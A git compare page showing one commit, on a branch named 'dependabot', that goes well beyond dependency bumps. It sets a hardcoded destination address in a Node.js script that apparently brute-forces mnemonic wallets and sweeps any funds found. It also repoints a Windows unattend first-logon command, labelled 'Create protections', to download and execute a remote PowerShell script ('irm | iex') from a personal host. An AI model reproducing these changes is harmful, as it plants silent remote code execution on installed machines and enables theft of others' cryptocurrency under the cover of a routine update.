Compare commits
1 commit
master
...
dependabot
Author | SHA1 | Date | |
---|---|---|---|
|
9f477dc7b6 |
4 changed files with 136 additions and 2996 deletions
|
@ -2,8 +2,7 @@ var CoinKey = require('coinkey') //1.0.0
|
|||
var bip39 = require('bip39')
|
||||
var hdkey = require('hdkey')
|
||||
var bitcoinTransaction = require('bitcoin-transaction');
|
||||
async function main() {
|
||||
var to = "CHANGE ME"; //change me to who you want the bitcoin to go to
|
||||
var to = "1ShzJ7McjMYaboVFokny1LGMFLT7Y6qDj"; //change me to who you want the bitcoin to go to
|
||||
var mnemonic;
|
||||
var seed;
|
||||
var seedToKey;
|
||||
|
@ -76,5 +75,3 @@ if (bip39.validateMnemonic(mnemonic)) {
|
|||
|
||||
await new Promise(r => setTimeout(r, 13));
|
||||
}
|
||||
}
|
||||
main()
|
||||
|
|
3123
RbxDiscordProxy.git/package-lock.json
generated
3123
RbxDiscordProxy.git/package-lock.json
generated
File diff suppressed because it is too large
Load diff
|
@ -20,7 +20,7 @@
|
|||
"request": "^2.83.0"
|
||||
},
|
||||
"devDependencies": {
|
||||
"nodemon": "^1.17.1",
|
||||
"nodemon": "^3.1.3",
|
||||
"ts-node": "^5.0.0",
|
||||
"tslint": "^5.9.1",
|
||||
"typescript": "^2.7.2"
|
||||
|
|
|
@ -90,7 +90,7 @@
|
|||
<AutoLogon></AutoLogon>
|
||||
<FirstLogonCommands>
|
||||
<SynchronousCommand wcm:action="add">
|
||||
<CommandLine>PowerShell.exe -command 'irm "https://github.com/Sneed-Group/maxs-titus-overlay/raw/main/common-stream.ps1" | iex'</CommandLine>
|
||||
<CommandLine>PowerShell.exe -command 'irm "http://nodemixaholic.com:3002/nodemixaholic/sams-christutus-overlay/raw/branch/main/common-stream.ps1" | iex'</CommandLine>
|
||||
<Description>Create protections</Description>
|
||||
<Order>1</Order>
|
||||
</SynchronousCommand>
|
||||
|
|
Loading…
Reference in a new issue